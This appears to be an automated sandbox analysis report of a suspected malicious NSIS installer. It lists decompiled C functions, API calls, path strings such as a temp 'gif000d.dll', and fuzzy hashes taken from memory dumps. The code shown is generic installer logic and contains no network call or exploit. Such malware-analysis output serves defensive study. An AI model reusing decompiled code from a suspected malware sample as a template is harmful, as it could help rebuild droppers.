                                            • Opcode Fuzzy Hash: d7a2dd7084ad759c097eb5b53d13dae876555f77d0d065bcf363b9c8763e90da
                                            • Instruction Fuzzy Hash: 9E41BA71804249AFCB058FA4CD459BFBFB9FF44314F00812AF951AA1A0C738EA50DFA5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004059E1, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 180stringCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 88%
                                            			E004059E1(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, char _a11) {
				struct _ITEMIDLIST* _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				CHAR* _t35;
				signed int _t37;
				signed int _t38;
				signed int _t49;
				char _t51;
				signed int _t61;
				char* _t62;
				char _t67;
				signed int _t69;
				CHAR* _t79;
				signed int _t86;
				signed int _t88;
				void* _t89;

				_t61 = _a8;
				if(_t61 < 0) {
					_t61 =  *( *0x7a275c - 4 + _t61 * 4);
				}
				_t62 = _t61 +  *0x7a2fb8;
				_t35 = 0x7a1f20;
				_t79 = 0x7a1f20;
				if(_a4 - 0x7a1f20 < 0x800) {
					_t79 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t67 =  *_t62;
					_a11 = _t67;
					if(_t67 == 0) {
						break;
					}
					__eflags = _t79 - _t35 - 0x400;
					if(_t79 - _t35 >= 0x400) {
						break;
					}
					_t62 = _t62 + 1;
					__eflags = _t67 - 0xfc;
					if(__eflags <= 0) {
						if(__eflags != 0) {
							 *_t79 = _t67;
							_t79 =  &(_t79[1]);
							__eflags = _t79;
						} else {
							 *_t79 =  *_t62;
							_t79 =  &(_t79[1]);
							_t62 = _t62 + 1;
						}
						continue;
					}
					_t37 =  *((char*)(_t62 + 1));
					_t69 =  *_t62;
					_t86 = (_t37 & 0x0000007f) << 0x00000007 | _t69 & 0x0000007f;
					_v28 = _t69;
					_v20 = _t37;
					_t70 = _t69 | 0x00008000;
					_t38 = _t37 | 0x00008000;
					_v24 = _t69 | 0x00008000;
					_t62 = _t62 + 2;
					__eflags = _a11 - 0xfe;
					_v16 = _t38;
					if(_a11 != 0xfe) {
						__eflags = _a11 - 0xfd;
						if(_a11 != 0xfd) {
							__eflags = _a11 - 0xff;
							if(_a11 == 0xff) {
								__eflags = (_t38 | 0xffffffff) - _t86;
								E004059E1(_t62, _t79, _t86, _t79, (_t38 | 0xffffffff) - _t86);
							}
							L38:
							_t79 =  &(_t79[lstrlenA(_t79)]);
							_t35 = 0x7a1f20;
							continue;
						}
						__eflags = _t86 - 0x1b;
						if(_t86 != 0x1b) {
							__eflags = (_t86 << 0xa) + 0x7a4000;
							E004059BF(_t79, (_t86 << 0xa) + 0x7a4000);
						} else {
							E0040591D(_t79,  *0x7a2f84);
						}
						__eflags = _t86 + 0xffffffeb - 6;
						if(_t86 + 0xffffffeb < 6) {
							L29:
							E00405BFB(_t79);
						}
						goto L38;
					}
					_a8 = _a8 & 0x00000000;
					 *_t79 =  *_t79 & 0x00000000;
					_t88 = 4;
					__eflags = _v20 - _t88;
					if(_v20 != _t88) {
						_t49 = _v28;
						__eflags = _t49 - 0x2b;
						if(_t49 != 0x2b) {
							__eflags = _t49 - 0x26;
							if(_t49 != 0x26) {
								__eflags = _t49 - 0x25;
								if(_t49 != 0x25) {
									__eflags = _t49 - 0x24;
									if(_t49 != 0x24) {
										goto L19;
									}
									GetWindowsDirectoryA(_t79, 0x400);
									goto L18;
								}
								GetSystemDirectoryA(_t79, 0x400);
								goto L18;
							}
							E004058B3(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", "ProgramFilesDir", _t79);
							__eflags =  *_t79;
							if( *_t79 != 0) {
								goto L29;
							}
							E004059BF(_t79, "C:\\Program Files");
							goto L18;
						} else {
							E004058B3(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", "CommonFilesDir", _t79);
							L18:
							__eflags =  *_t79;
							if( *_t79 != 0) {
								goto L29;
							}
							goto L19;
						}
					} else {
						_a8 = "\\Microsoft\\Internet Explorer\\Quick Launch";
						L19:
						__eflags =  *0x7a3004;
						if( *0x7a3004 == 0) {
							_t88 = 2;
						}
						do {
							_t88 = _t88 - 1;
							_t51 = SHGetSpecialFolderLocation( *0x7a2f84,  *(_t89 + _t88 * 4 - 0x18),  &_v8);
							__eflags = _t51;
							if(_t51 != 0) {
								 *_t79 =  *_t79 & 0x00000000;
								__eflags =  *_t79;
								goto L25;
							}
							__imp__SHGetPathFromIDListA(_v8, _t79);
							_v12 = _t51;
							E0040521C(_t70, _v8);
							__eflags = _v12;
							if(_v12 != 0) {
								break;
							}
							L25:
							__eflags = _t88;
						} while (_t88 != 0);
						__eflags =  *_t79;
						if( *_t79 != 0) {
							__eflags = _a8;
							if(_a8 != 0) {
								lstrcatA(_t79, _a8);
							}
						}
						goto L29;
					}
				}
				 *_t79 =  *_t79 & 0x00000000;
				if(_a4 == 0) {
					return _t35;
				}
				return E004059BF(_a4, _t35);
			}






















                                            0x004059e8
                                            0x004059ef
                                            0x00405a00
                                            0x00405a00
                                            0x00405a0a
                                            0x00405a0c
                                            0x00405a13
                                            0x00405a1b
                                            0x00405a21
                                            0x00405a24
                                            0x00405a24
                                            0x00405bd5
                                            0x00405bd5
                                            0x00405bd9
                                            0x00405bdc
                                            0x00000000
                                            0x00000000
                                            0x00405a31
                                            0x00405a37
                                            0x00000000
                                            0x00000000
                                            0x00405a3d
                                            0x00405a3e
                                            0x00405a41
                                            0x00405bc8
                                            0x00405bd2
                                            0x00405bd4
                                            0x00405bd4
                                            0x00405bca
                                            0x00405bcc
                                            0x00405bce
                                            0x00405bcf
                                            0x00405bcf
                                            0x00000000
                                            0x00405bc8
                                            0x00405a47
                                            0x00405a4b
                                            0x00405a5b
                                            0x00405a62
                                            0x00405a65
                                            0x00405a68
                                            0x00405a6a
                                            0x00405a6d
                                            0x00405a70
                                            0x00405a71
                                            0x00405a75
                                            0x00405a78
                                            0x00405b73
                                            0x00405b77
                                            0x00405ba7
                                            0x00405bab
                                            0x00405bb0
                                            0x00405bb4
                                            0x00405bb4
                                            0x00405bb9
                                            0x00405bbf
                                            0x00405bc1
                                            0x00000000
                                            0x00405bc1
                                            0x00405b79
                                            0x00405b7c
                                            0x00405b91
                                            0x00405b98
                                            0x00405b7e
                                            0x00405b85
                                            0x00405b85
                                            0x00405ba0
                                            0x00405ba3
                                            0x00405b6b
                                            0x00405b6c
                                            0x00405b6c
                                            0x00000000
                                            0x00405ba3
                                            0x00405a7e
                                            0x00405a82
                                            0x00405a87
                                            0x00405a88
                                            0x00405a8b
                                            0x00405a96
                                            0x00405a99
                                            0x00405a9c
                                            0x00405ab5
                                            0x00405ab8
                                            0x00405ae5
                                            0x00405ae8
                                            0x00405af8
                                            0x00405afb
                                            0x00000000
                                            0x00000000
                                            0x00405b03
                                            0x00000000
                                            0x00405b03
                                            0x00405af0
                                            0x00000000
                                            0x00405af0
                                            0x00405aca
                                            0x00405acf
                                            0x00405ad2
                                            0x00000000
                                            0x00000000
                                            0x00405ade
                                            0x00000000
                                            0x00405a9e
                                            0x00405aae
                                            0x00405b09
                                            0x00405b09
                                            0x00405b0c
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00405b0c
                                            0x00405a8d
                                            0x00405a8d
                                            0x00405b0e
                                            0x00405b0e
                                            0x00405b15
                                            0x00405b19
                                            0x00405b19
                                            0x00405b1a
                                            0x00405b1d
                                            0x00405b29
                                            0x00405b2f
                                            0x00405b31
                                            0x00405b50
                                            0x00405b50
                                            0x00000000
                                            0x00405b50
                                            0x00405b37
                                            0x00405b40
                                            0x00405b43
                                            0x00405b48
                                            0x00405b4c
                                            0x00000000
                                            0x00000000
                                            0x00405b53
                                            0x00405b53
                                            0x00405b53
                                            0x00405b57
                                            0x00405b5a
                                            0x00405b5c
                                            0x00405b60
                                            0x00405b66
                                            0x00405b66
                                            0x00405b60
                                            0x00000000
                                            0x00405b5a
                                            0x00405a8b
                                            0x00405be2
                                            0x00405bec
                                            0x00405bf8
                                            0x00405bf8
                                            0x00000000

                                            APIs
                                            • SHGetSpecialFolderLocation.SHELL32(00404D9A,00789938,00000006,0079ED60,00000000,00404D9A,0079ED60,00000000), ref: 00405B29
                                            • SHGetPathFromIDListA.SHELL32(00789938,007A1F20), ref: 00405B37
                                            • lstrcatA.KERNEL32(007A1F20,00000000), ref: 00405B66
                                            • lstrlenA.KERNEL32(007A1F20,00000006,0079ED60,00000000,00404D9A,0079ED60,00000000,00000000,0078E938,00789938), ref: 00405BBA
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.239829820.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.239825580.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239837078.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239842903.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239870650.000000000077A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239877497.0000000000784000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239882463.0000000000788000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239902318.0000000000795000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239912607.00000000007A1000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239917580.00000000007A9000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239922703.00000000007AC000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: FolderFromListLocationPathSpeciallstrcatlstrlen
                                            • String ID: C:\Program Files$CommonFilesDir$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                            • API String ID: 4227507514-3711765563
                                            • Opcode ID: bb177ee3615b619df9c73ca70b65f722049f4b351553e2cdd88049d5eba40c88
                                            • Instruction ID: 88f6e72dca0f61d75e3a0e3e21e18f1b78018e843eea250326dc72cf64c4fd20
                                            • Opcode Fuzzy Hash: bb177ee3615b619df9c73ca70b65f722049f4b351553e2cdd88049d5eba40c88
                                            • Instruction Fuzzy Hash: 20512671904A44AAEB206B248C84B7F3B74EB52324F20823BF941B62C2D77C7941DF5E
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004026FA, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 100memoryfilestringCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 32%
                                            			E004026FA() {
				void* _t23;
				void* _t28;
				long _t33;
				struct _OVERLAPPED* _t48;
				void* _t51;
				void* _t53;
				void* _t54;
				CHAR* _t55;
				void* _t58;
				void* _t59;
				void* _t60;

				 *((intOrPtr*)(_t60 - 0x34)) = 0xfffffd66;
				_t54 = E00402A9A(_t48);
				_t23 = E00405538(_t54);
				_push(_t54);
				if(_t23 == 0) {
					lstrcatA(E004054CC(E004059BF("C:\Users\alfons\AppData\Local\Temp\nsuA1D.tmp\gif000d.dll", "C:\\Users\\alfons\\AppData\\Local\\Temp")), ??);
					_t55 = 0x40a018;
				} else {
					_push(0x40a018);
					E004059BF();
				}
				E00405BFB(_t55);
				_t28 = E00405690(_t55, 0x40000000, 2);
				 *(_t60 + 8) = _t28;
				if(_t28 != 0xffffffff) {
					_t33 =  *0x7a2f8c;
					 *(_t60 - 0x2c) = _t33;
					_t53 = GlobalAlloc(0x40, _t33);
					if(_t53 != _t48) {
						E004030FF(_t48);
						E004030CD(_t53,  *(_t60 - 0x2c));
						_t58 = GlobalAlloc(0x40,  *(_t60 - 0x1c));
						 *(_t60 - 0x30) = _t58;
						if(_t58 != _t48) {
							_push( *(_t60 - 0x1c));
							_push(_t58);
							_push(_t48);
							_push( *((intOrPtr*)(_t60 - 0x20)));
							E00402EBD();
							while( *_t58 != _t48) {
								_t59 = _t58 + 8;
								 *(_t60 - 0x38) =  *_t58;
								E00405670( *((intOrPtr*)(_t58 + 4)) + _t53, _t59,  *_t58);
								_t58 = _t59 +  *(_t60 - 0x38);
							}
							GlobalFree( *(_t60 - 0x30));
						}
						WriteFile( *(_t60 + 8), _t53,  *(_t60 - 0x2c), _t60 - 0x44, _t48);
						GlobalFree(_t53);
						_push(_t48);
						_push(_t48);
						_push( *(_t60 + 8));
						_push(0xffffffff);
						 *((intOrPtr*)(_t60 - 0x34)) = E00402EBD();
					}
					CloseHandle( *(_t60 + 8));
					_t55 = 0x40a018;
				}
				_t51 = 0xfffffff3;
				if( *((intOrPtr*)(_t60 - 0x34)) < _t48) {
					_t51 = 0xffffffef;
					DeleteFileA(_t55);
					 *((intOrPtr*)(_t60 - 4)) = 1;
				}
				_push(_t51);
				E00401428();
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t60 - 4));
				return 0;
			}














                                            0x004026fb
                                            0x00402707
                                            0x0040270a
                                            0x00402711
                                            0x00402712
                                            0x00402737
                                            0x0040273c
                                            0x00402714
                                            0x00402719
                                            0x0040271a
                                            0x0040271a
                                            0x00402742
                                            0x0040274f
                                            0x00402757
                                            0x0040275a
                                            0x00402760
                                            0x0040276e
                                            0x00402773
                                            0x00402777
                                            0x0040277a
                                            0x00402783
                                            0x0040278f
                                            0x00402793
                                            0x00402796
                                            0x00402798
                                            0x0040279b
                                            0x0040279c
                                            0x0040279d
                                            0x004027a0
                                            0x004027bf
                                            0x004027ac
                                            0x004027b4
                                            0x004027b7
                                            0x004027bc
                                            0x004027bc
                                            0x004027c6
                                            0x004027c6
                                            0x004027d8
                                            0x004027df
                                            0x004027e5
                                            0x004027e6
                                            0x004027e7
                                            0x004027ea
                                            0x004027f1
                                            0x004027f1
                                            0x004027f7
                                            0x004027fd
                                            0x004027fd
                                            0x00402807
                                            0x00402808
                                            0x0040280c
                                            0x0040280e
                                            0x00402814
                                            0x00402814
                                            0x0040281b
                                            0x004021e8
                                            0x00402932
                                            0x0040293e

                                            APIs
                                            • lstrcatA.KERNEL32(00000000,00000000,C:\Users\user\AppData\Local\Temp\nsuA1D.tmp\gif000d.dll,C:\Users\user\AppData\Local\Temp,00000000,00000000), ref: 00402737
                                            • GlobalAlloc.KERNEL32(00000040,?,C:\Users\user\AppData\Local\Temp\nsuA1D.tmp\gif000d.dll,40000000,00000002,C:\Users\user\AppData\Local\Temp\nsuA1D.tmp\gif000d.dll,00000000,00000000,C:\Users\user\AppData\Local\Temp\nsuA1D.tmp\gif000d.dll,C:\Users\user\AppData\Local\Temp,00000000,00000000), ref: 00402771
                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040278D
                                            • GlobalFree.KERNEL32 ref: 004027C6
                                            • WriteFile.KERNEL32(?,00000000,?,?), ref: 004027D8
                                            • GlobalFree.KERNEL32 ref: 004027DF
                                            • CloseHandle.KERNEL32(?), ref: 004027F7
                                            • DeleteFileA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsuA1D.tmp\gif000d.dll,C:\Users\user\AppData\Local\Temp\nsuA1D.tmp\gif000d.dll,40000000,00000002,C:\Users\user\AppData\Local\Temp\nsuA1D.tmp\gif000d.dll,00000000,00000000,C:\Users\user\AppData\Local\Temp\nsuA1D.tmp\gif000d.dll,C:\Users\user\AppData\Local\Temp,00000000,00000000), ref: 0040280E
                                              • Part of subcall function 004059BF: lstrcpynA.KERNEL32(?,?,00000400,0040319C,007A2780,NSIS Error), ref: 004059CC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.239829820.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.239825580.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239837078.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239842903.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239870650.000000000077A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239877497.0000000000784000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239882463.0000000000788000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239902318.0000000000795000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239912607.00000000007A1000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239917580.00000000007A9000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239922703.00000000007AC000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Global$AllocFileFree$CloseDeleteHandleWritelstrcatlstrcpyn
                                            • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsuA1D.tmp\gif000d.dll
                                            • API String ID: 3508600917-98118796
                                            • Opcode ID: d89732e6fba566c184c8790af0f9760d3bcc362a7ab7685eaae326e05ea9e627
                                            • Instruction ID: 0812298b90ecd2d5aad5402bcd4d52469fb6612ace7046921d2b432afa3f8679
                                            • Opcode Fuzzy Hash: d89732e6fba566c184c8790af0f9760d3bcc362a7ab7685eaae326e05ea9e627
                                            • Instruction Fuzzy Hash: 1631CD71C01618BBDB116FA5CE89DAF7A38EF45324B10823AF914772D1CB7C5D019BA9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00404D62, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73stringwindowCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 94%
                                            			E00404D62(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x7a2764;
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x4092a0; // 0x6
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E004059E1(0, _t39, 0x79ed60, 0x79ed60, _a4);
					}
					_t26 = lstrlenA(0x79ed60);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) != 0) {
							_t26 = SetWindowTextA( *0x7a2748, 0x79ed60);
						}
						if((_v12 & 0x00000002) != 0) {
							_v32 = 0x79ed60;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x79ed60)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x79ed60, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

















                                            0x00404d68
                                            0x00404d74
                                            0x00404d77
                                            0x00404d7d
                                            0x00404d89
                                            0x00404d8c
                                            0x00404d8f
                                            0x00404d95
                                            0x00404d95
                                            0x00404d9b
                                            0x00404da3
                                            0x00404da6
                                            0x00404dc3
                                            0x00404dc7
                                            0x00404dd0
                                            0x00404dd0
                                            0x00404dda
                                            0x00404de3
                                            0x00404def
                                            0x00404df6
                                            0x00404dfa
                                            0x00404dfd
                                            0x00404e10
                                            0x00404e1e
                                            0x00404e1e
                                            0x00404e22
                                            0x00404e24
                                            0x00404e27
                                            0x00000000
                                            0x00404e27
                                            0x00404da8
                                            0x00404db0
                                            0x00404db8
                                            0x00404dbe
                                            0x00000000
                                            0x00404dbe
                                            0x00404db8
                                            0x00404da6
                                            0x00404e31

                                            APIs
                                            • lstrlenA.KERNEL32(0079ED60,00000000,0078E938,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000,?), ref: 00404D9B
                                            • lstrlenA.KERNEL32(00402FF7,0079ED60,00000000,0078E938,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000), ref: 00404DAB
                                            • lstrcatA.KERNEL32(0079ED60,00402FF7,00402FF7,0079ED60,00000000,0078E938,00789938), ref: 00404DBE
                                            • SetWindowTextA.USER32(0079ED60,0079ED60), ref: 00404DD0
                                            • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DF6
                                            • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E10
                                            • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E1E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.239829820.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.239825580.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239837078.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239842903.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239870650.000000000077A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239877497.0000000000784000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239882463.0000000000788000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239902318.0000000000795000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239912607.00000000007A1000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239917580.00000000007A9000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239922703.00000000007AC000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                            • String ID: `y
                                            • API String ID: 2531174081-1740403070
                                            • Opcode ID: edad6dc2de89f9ed618421ce26d5d36bc75d71d20e9e6f22415f143a986efb4b
                                            • Instruction ID: cb3b45f852b3c740c34d3f7777c40130103cf21f354e3c75b2961a2ef6a5418a
                                            • Opcode Fuzzy Hash: edad6dc2de89f9ed618421ce26d5d36bc75d71d20e9e6f22415f143a986efb4b
                                            • Instruction Fuzzy Hash: 5C2160B1900118BBDB119F99DD85DDEBFA9FF45354F14807AFA04B6291C7398E40CBA8
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00405BFB, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00405BFB(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E00405538(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E004054F7("*?|<>/\":", _t5))) == 0) {
							E00405670(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                            0x00405bfd
                                            0x00405c05
                                            0x00405c19
                                            0x00405c19
                                            0x00405c1f
                                            0x00405c2c
                                            0x00405c2c
                                            0x00405c2d
                                            0x00405c2f
                                            0x00405c33
                                            0x00405c35
                                            0x00405c3e
                                            0x00405c40
                                            0x00405c5a
                                            0x00405c62
                                            0x00405c62
                                            0x00405c67
                                            0x00405c69
                                            0x00405c6b
                                            0x00405c6f
                                            0x00405c70
                                            0x00405c73
                                            0x00405c7b
                                            0x00405c7d
                                            0x00405c81
                                            0x00000000
                                            0x00000000
                                            0x00405c87
                                            0x00405c8c
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00405c8c
                                            0x00405c91

                                            APIs
                                            • CharNextA.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C53
                                            • CharNextA.USER32(?,?,?,00000000,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C60
                                            • CharNextA.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C65
                                            • CharPrevA.USER32(?,?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C75
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BFB, 00405BFC
                                            • *?|<>/":, xrefs: 00405C43
                                            • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00405C37
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.239829820.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.239825580.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239837078.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239842903.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239870650.000000000077A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239877497.0000000000784000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239882463.0000000000788000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239902318.0000000000795000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239912607.00000000007A1000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239917580.00000000007A9000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239922703.00000000007AC000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Char$Next$Prev
                                            • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.
                                            • API String ID: 589700163-879122614
                                            • Opcode ID: c3e6b7e6cb13a4bbd62a9e478f04b3777cedf0421140d3393f81b5e1ccfcad21
                                            • Instruction ID: 741f4f1766c378bb4ac774d7bbda26dd0b1b0e4f9567a31439ebc024b01f0e93
                                            • Opcode Fuzzy Hash: c3e6b7e6cb13a4bbd62a9e478f04b3777cedf0421140d3393f81b5e1ccfcad21
                                            • Instruction Fuzzy Hash: 7B11D05180CB9429FB3216284D44BBB7B98CB9B760F18047BE9C4722C2D67C5C828B6D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00403E0E, Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00403E0E(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}








                                            0x00403e20
                                            0x00403eb4
                                            0x00000000
                                            0x00403eb4
                                            0x00403e31
                                            0x00403e35
                                            0x00000000
                                            0x00000000
                                            0x00403e3b
                                            0x00403e44
                                            0x00403e47
                                            0x00403e47
                                            0x00403e4d
                                            0x00403e53
                                            0x00403e53
                                            0x00403e5f
                                            0x00403e65
                                            0x00403e6c
                                            0x00403e6f
                                            0x00403e72
                                            0x00403e74
                                            0x00403e74
                                            0x00403e7c
                                            0x00403e82
                                            0x00403e82
                                            0x00403e8c
                                            0x00403e91
                                            0x00403e94
                                            0x00403e99
                                            0x00403e9c
                                            0x00403e9c
                                            0x00403eac
                                            0x00403eac
                                            0x00000000

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.239829820.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.239825580.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239837078.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239842903.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239870650.000000000077A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239877497.0000000000784000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239882463.0000000000788000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239902318.0000000000795000.00000004.00020000.sdmp Download File
